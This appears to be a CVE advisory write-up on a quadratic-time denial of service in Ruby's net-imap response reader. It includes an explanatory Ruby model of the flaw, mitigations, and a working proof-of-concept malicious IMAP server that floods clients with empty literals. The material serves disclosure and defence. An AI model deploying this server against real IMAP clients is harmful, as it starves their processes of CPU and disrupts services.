How the CVE Works
Net::IMAP::ResponseReader has quadratic time complexity when reading large responses that contain many string literals. A hostile server can send crafted responses to exhaust client CPU for a denial-of-service attack.

For each literal in a response, ResponseReader rescans the entire growing response buffer using a regular expression whose running time is linear in the size of that buffer. With many literals this adds up to O(n²) total work. The check should run in constant time: the regex is anchored to the end of the buffer, and only the last 23 bytes can hold a literal's size prefix, so only those bytes need to be examined.

Because of this super-linear complexity, the protection offered by max_response_size is bypassed: a response can stay well below the default size limit while still causing very high CPU consumption. ResponseReader runs continuously in the receiver thread until the connection closes, so the disproportionate CPU time lands on the client's receiver thread. For a response near the default max_response_size, each regex scan can take 100–200 ms on modern hardware, and the scan is repeated once per literal, which is up to 200k times per megabyte of response (the shortest possible literal, `{0}\r\n`, is five bytes). Each scan holds the Global VM Lock for its whole duration, so other Ruby threads cannot run while it proceeds; they are not fully blocked, because they can be scheduled between scans, but their run time is significantly impacted.
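To make the scanning cost concrete, here is a toy model of the literal-detection loop, added as an example; it is not net-imap's own code, and the names (LITERAL_PREFIX_RE, TAIL_WINDOW, build_response, scan_literals, compare) and the exact shape of the regex are assumptions. It reads a constructed response carrying many literals the way a line-oriented reader would, and compares a check that hands the whole buffer to the end-anchored regex with one that hands it only the last 23 bytes. Both find exactly the same literals; the difference is how many bytes the regex engine is given, which grows quadratically with the number of literals in one case and linearly in the other.

```ruby
require "stringio"

# Assumption: the end-anchored regex that detects a literal's "{size}\r\n"
# prefix at the end of the buffer has this shape (name and pattern are this
# example's own, not net-imap's).
LITERAL_PREFIX_RE = /\{(\d+)\}\r\n\z/n
TAIL_WINDOW = 23 # the number of trailing bytes the advisory says are relevant

# Constructed sample input: one untagged response carrying `count` copies of
# the same literal, e.g. "* 1 FETCH ({3}\r\nAAA{3}\r\nAAA)\r\n".
def build_response(count, literal: "")
  "* 1 FETCH (" + ("{#{literal.bytesize}}\r\n#{literal}" * count) + ")\r\n"
end

# VULNERABLE strategy: run the regex over the entire buffer. \z anchors the
# match, but `\d+` has no length bound, so the engine still tries positions
# across the whole string and the cost of each check grows with everything
# received so far.
VULNERABLE_CHECK = lambda do |buffer|
  m = LITERAL_PREFIX_RE.match(buffer)
  [m && m[1].to_i, buffer.bytesize]
end

# FIXED strategy: a literal prefix can only occupy the tail of the buffer, so
# run the same regex over the last TAIL_WINDOW bytes. Cost per check is
# bounded no matter how large the buffer has grown.
FIXED_CHECK = lambda do |buffer|
  tail = buffer.byteslice([buffer.bytesize - TAIL_WINDOW, 0].max, TAIL_WINDOW)
  m = LITERAL_PREFIX_RE.match(tail)
  [m && m[1].to_i, tail.bytesize]
end

# Model of a line-oriented response reader: append each CRLF-terminated chunk
# to a growing buffer, ask `check` whether the buffer now ends in a literal
# prefix, and if so copy the literal's bytes in verbatim (they are never
# re-examined, so a literal body that itself looks like "{0}\r\n" is harmless).
# Returns the literal sizes found and the total number of bytes handed to the
# regex engine across all checks.
def scan_literals(response, check)
  io = StringIO.new(response.b)
  buffer = String.new(encoding: Encoding::BINARY)
  sizes = []
  regex_bytes = 0
  until io.eof?
    buffer << io.gets("\r\n")
    size, examined = check.call(buffer)
    regex_bytes += examined
    next unless size
    sizes << size
    buffer << (io.read(size) || "")
  end
  [sizes, regex_bytes]
end

# Run both strategies on the same response and report the work each one did.
def compare(count)
  response = build_response(count)
  vuln_sizes, vuln_bytes = scan_literals(response, VULNERABLE_CHECK)
  fixed_sizes, fixed_bytes = scan_literals(response, FIXED_CHECK)
  raise "strategies disagree on the literals" unless vuln_sizes == fixed_sizes
  { literals: vuln_sizes.size, response_bytes: response.bytesize,
    vulnerable_regex_bytes: vuln_bytes, fixed_regex_bytes: fixed_bytes }
end

if __FILE__ == $PROGRAM_NAME
  [100, 1_000, 5_000].each do |n|
    r = compare(n)
    puts format("%6d literals, %8d response bytes: regex saw %12d bytes (vulnerable) vs %6d (fixed)",
                r[:literals], r[:response_bytes], r[:vulnerable_regex_bytes], r[:fixed_regex_bytes])
  end
end
```

With 1,000 empty literals the response is 5,014 bytes, yet the vulnerable strategy feeds about 2.5 MB to the regex engine while the fixed one feeds 23 KB; doubling the literal count quadruples the former and merely doubles the latter, which is the behaviour that lets a response far below max_response_size burn the receiver thread's CPU.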
DailyCVE Form
Platform: Ruby net‑imap
Version: prior to 0.6.4/0.5.14/0.4.24
Vulnerability: Quadratic CPU DoS
Severity: Low
Date: 2026‑04‑24
Prediction: Patch 2026‑04‑25
What Undercode Says
Check the installed version to see whether it is one of the affected releases:
gem list net-imap
ruby -rnet/imap -e 'puts Net::IMAP::VERSION'
Simulate a malicious server. A single large literal is not enough to trigger the problem (it causes only one scan); the response has to contain many literals, so this server sends 200,000 empty ones, about 1 MiB in total:
require 'socket'
server = TCPServer.new('localhost', 1143)
loop do
  client = server.accept
  client.write "* OK Malicious IMAP\r\n"
  # One untagged response holding 200,000 empty literals ("{0}\r\n", five bytes
  # each). The whole response stays far below the default max_response_size,
  # yet every literal makes the vulnerable reader rescan the entire buffer so far.
  client.write "* 1 FETCH (" + ("{0}\r\n" * 200_000) + ")\r\n"
  sleep 60 # keep the connection open while the client's receiver thread burns CPU
  client.close
end
Connect a vulnerable client to observe the CPU spike:
require 'net/imap'
imap = Net::IMAP.new('localhost', port: 1143, ssl: false)
# Net::IMAP.new returns once the greeting has been read; the receiver thread is
# now busy inside ResponseReader. Watch the process in top while the main
# thread sleeps: the receiver thread pegs a core and other threads crawl.
sleep 60
imap.disconnect
Exploit
A malicious IMAP server sends a response that contains an extremely large number of string literals. The client's ResponseReader rescans the entire growing buffer for each literal, so CPU usage grows quadratically with the number of literals. Because each regex scan holds the Global VM Lock, other threads in the application are starved of CPU time while the receiver thread churns, leaving the client process largely unresponsive for as long as the connection stays open. The server needs nothing from the client beyond the connection itself; as in the simulation above, the response can follow the greeting immediately.
Protection from this CVE
- Upgrade net‑imap to a patched version: 0.6.4, 0.5.14, or 0.4.24.
- Do not connect to untrusted IMAP servers.
- When connecting to untrusted servers, set a much smaller `max_response_size` (e.g., 8 KiB). This limits the impact, though it may be too small for fetching large message bodies.
- Monitor CPU usage of IMAP client threads and terminate connections that cause sustained high CPU.
Impact
High CPU consumption in the client's receiver thread, leading to denial of service. The CPU exhaustion bypasses `max_response_size` limits and can be triggered by a response that remains below the default size limit. Each regex scan holds the Global VM Lock, so the performance of other threads is heavily impaired and the application becomes largely unresponsive while the malicious response is being read. The vulnerability affects all versions prior to 0.6.4 / 0.5.14 / 0.4.24.
Sources:
Reported By: github.com

